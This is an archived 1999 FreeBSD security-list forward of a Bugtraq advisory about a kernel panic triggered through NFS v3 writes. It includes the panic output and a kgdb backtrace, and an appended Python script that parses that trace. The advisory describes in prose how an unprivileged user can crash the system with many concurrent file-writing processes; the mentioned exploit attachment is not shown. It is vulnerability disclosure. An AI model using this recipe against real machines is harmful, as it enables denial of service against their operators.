From owner-freebsd-security Sat Sep 4 7:29:15 1999
Date: Sat, 04 Sep 1999 22:28:24 +0800
From: Foxfair Hu
To: security@FreeBSD.org
Subject: Fw: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ]
Message-Id: <37D12C8896.4BDAFOXFAIR@drago.cert.org.tw>

Forwarded by Foxfair Hu

---------------- Original message follows ----------------
From: Sebastien Petit
To: BUGTRAQ@SECURITYFOCUS.COM
Date: Thu, 2 Sep 1999 16:53:03 +0200
Subject: [ Kernel panic with FreeBSD-3.2-19990830-STABLE ]
--

Hi !

There is a problem with FreeBSD 3.2-RELEASE and -STABLE and perhaps FreeBSD 3.x. The system panics when a program does multiple accesses on an nfs v3 mounted directory with default mount options (ie: mount x.x.x.x:/nfs /usr2). FreeBSD 3.2 crashes immediately with no warnings and just a "panic: getnewbuf: cannot get buffer, infinite recursion failure", without root privileges. This is simple to reproduce with a program that creates a lot of processes (ie: 120) accessing the nfs mounted directory and just does "open", "seek", "write", "close". NetBSD is not vulnerable.

gdb:

panic: getnewbuf: cannot get buffer, infinite recursion failure
syncing disks...
panic: getnewbuf: cannot get buffer, infinite recursion failure
dumping to dev 20001, offset 272816
dump 127 126 125 124 123 122 121 120 119 118 117 116 115 114 113 112 111 110 109 108 107 106 105 104 103 102 101 100 99 98 97 96 95 94 93 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1
---
#0 boot (howto=260) at ../../kern/kern_shutdown.c:285
285 dumppcb.pcb_cr3 = rcr3();
(kgdb) where
#0 boot (howto=260) at ../../kern/kern_shutdown.c:285
#1 0xc012f87c in at_shutdown (function=0xc02075f1 <__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>, arg=0x200, queue=1174437888) at ../../kern/kern_shutdown.c:446
#2 0xc014dc9f in getnewbuf (vp=0xcc1edb40, blkno=2293824, slpflag=0, slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074
#3 0xc014e58c in getblk (vp=0xcc1edb40, blkno=2293824, size=8192, slpflag=0, slptimeo=0) at ../../kern/vfs_bio.c:1511
#4 0xc014cd85 in bread (vp=0xcc1edb40, blkno=2293824, size=8192, cred=0x0, bpp=0xcc3acbec) at ../../kern/vfs_bio.c:282
#5 0xc01b60f8 in ffs_update (vp=0xcc21ea40, waitfor=0) at ../../ufs/ffs/ffs_inode.c:98
#6 0xc01ba92f in ffs_fsync (ap=0xcc3acc74) at ../../ufs/ffs/ffs_vnops.c:258
#7 0xc01b8cb7 in ffs_sync (mp=0xc1d01c00, waitfor=2, cred=0xc0756300, p=0xc0246624) at vnode_if.h:499
#8 0xc0155f37 in sync (p=0xc0246624, uap=0x0) at ../../kern/vfs_syscalls.c:549
#9 0xc012f43d in boot (howto=256) at ../../kern/kern_shutdown.c:203
#10 0xc012f87c in at_shutdown (function=0xc02075f1 <__set_sysctl__vfs_sym_sysctl___vfs_kvafreespace+361>, arg=0x2000, queue=12443648) at ../../kern/kern_shutdown.c:446
#11 0xc014dc9f in getnewbuf (vp=0xcc243280, blkno=1519, slpflag=0, slptimeo=0, size=8192, maxsize=8192) at ../../kern/vfs_bio.c:1074
#12 0xc014e58c in getblk (vp=0xcc243280, blkno=1519, size=8192, slpflag=0, slptimeo=0) at ../../kern/vfs_bio.c:1511
#13 0xc017b9fa in nfs_getcacheblk (vp=0xcc243280, bn=1519, size=8192, p=0xcc36f700) at ../../nfs/nfs_bio.c:904
#14 0xc017b5a5 in nfs_write (ap=0xcc3acec8) at ../../nfs/nfs_bio.c:765
#15 0xc0159dea in vn_write (fp=0xc1d40d40, uio=0xcc3acf10, cred=0xc1d36300, flags=0) at vnode_if.h:331
#16 0xc013a73a in dofilewrite (p=0xcc36f700, fp=0xc1d40d40, fd=3, buf=0x804b000, nbyte=102400, offset=-1, flags=0) at ../../kern/sys_generic.c:363
#17 0xc013a643 in write (p=0xcc36f700, uap=0xcc3acf94) at ../../kern/sys_generic.c:298
#18 0xc01e6edb in syscall (frame={tf_es = 39, tf_ds = 39, tf_edi = 0, tf_esi = 12384951, tf_ebp = -1077945584, tf_isp = -868560924, tf_ebx = 12384951, tf_edx = 0, tf_ecx = 12384951, tf_eax = 4, tf_trapno = 7, tf_err = 2, tf_eip = 671700396, tf_cs = 31, tf_eflags = 582, tf_esp = -1077946192, tf_ss = 39}) at ../../i386/i386/trap.c:1100
#19 0xc01dda5c in Xint0x80_syscall ()
#20 0x8048799 in ?? ()

Exploit nfsexp.c is attached to this message.

Spe & Gro.
---
spe@oleane.net
gro@oleane.net

[Attachment nfsbench.c (application/octet-stream, base64 body) omitted]
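As an added forensic aid (this script is not part of the original report or of FreeBSD), the Python below parses a kgdb "where" listing like the one quoted above and reports which kernel functions are re-entered; on this trace it recovers the loop the panic message names: getnewbuf fails, at_shutdown/boot runs sync(), and the FFS fsync path calls getnewbuf again. The frame list is a constructed copy of the report's backtrace with the argument lists shortened to "(...)".

```python
import re

# Constructed sample: the kgdb "where" output quoted in the report above, with
# each frame's argument list shortened to "(...)" to keep the block short.
KGDB_WHERE = """\
#0 boot (...) at ../../kern/kern_shutdown.c:285
#1 0xc012f87c in at_shutdown (...) at ../../kern/kern_shutdown.c:446
#2 0xc014dc9f in getnewbuf (...) at ../../kern/vfs_bio.c:1074
#3 0xc014e58c in getblk (...) at ../../kern/vfs_bio.c:1511
#4 0xc014cd85 in bread (...) at ../../kern/vfs_bio.c:282
#5 0xc01b60f8 in ffs_update (...) at ../../ufs/ffs/ffs_inode.c:98
#6 0xc01ba92f in ffs_fsync (...) at ../../ufs/ffs/ffs_vnops.c:258
#7 0xc01b8cb7 in ffs_sync (...) at vnode_if.h:499
#8 0xc0155f37 in sync (...) at ../../kern/vfs_syscalls.c:549
#9 0xc012f43d in boot (...) at ../../kern/kern_shutdown.c:203
#10 0xc012f87c in at_shutdown (...) at ../../kern/kern_shutdown.c:446
#11 0xc014dc9f in getnewbuf (...) at ../../kern/vfs_bio.c:1074
#12 0xc014e58c in getblk (...) at ../../kern/vfs_bio.c:1511
#13 0xc017b9fa in nfs_getcacheblk (...) at ../../nfs/nfs_bio.c:904
#14 0xc017b5a5 in nfs_write (...) at ../../nfs/nfs_bio.c:765
#15 0xc0159dea in vn_write (...) at vnode_if.h:331
#16 0xc013a73a in dofilewrite (...) at ../../kern/sys_generic.c:363
#17 0xc013a643 in write (...) at ../../kern/sys_generic.c:298
#18 0xc01e6edb in syscall (...) at ../../i386/i386/trap.c:1100
#19 0xc01dda5c in Xint0x80_syscall ()
#20 0x8048799 in ?? ()
"""

# One kgdb frame: "#N [0xADDR in] func (args) [at file:line]".
FRAME_RE = re.compile(r"^#(?P<num>\d+)\s+(?:0x[0-9a-f]+\s+in\s+)?(?P<func>\S+)\s*"
                      r"\(.*?\)(?:\s+at\s+(?P<loc>\S+))?\s*$")

def parse_frames(text):
    """Return [(frame_no, function, 'file:line' or None)], innermost first."""
    matches = (FRAME_RE.match(line.strip()) for line in text.splitlines())
    return [(int(m.group("num")), m.group("func"), m.group("loc")) for m in matches if m]

def reentered_functions(frames):
    """Functions that appear more than once, mapped to their frame numbers."""
    seen = {}
    for num, func, _ in frames:
        seen.setdefault(func, []).append(num)
    return {f: nums for f, nums in seen.items() if len(nums) > 1}

def recursion_cycle(frames, func):
    """Call chain, innermost first, from the inner repeat of func out to the outer one."""
    nums = reentered_functions(frames).get(func, [])
    return [f for n, f, _ in frames if nums and nums[0] <= n <= nums[1]]
```

Running recursion_cycle(parse_frames(KGDB_WHERE), "getnewbuf") returns the ten-function loop from getnewbuf through sync/boot/at_shutdown back to getnewbuf, which is what "infinite recursion failure" refers to.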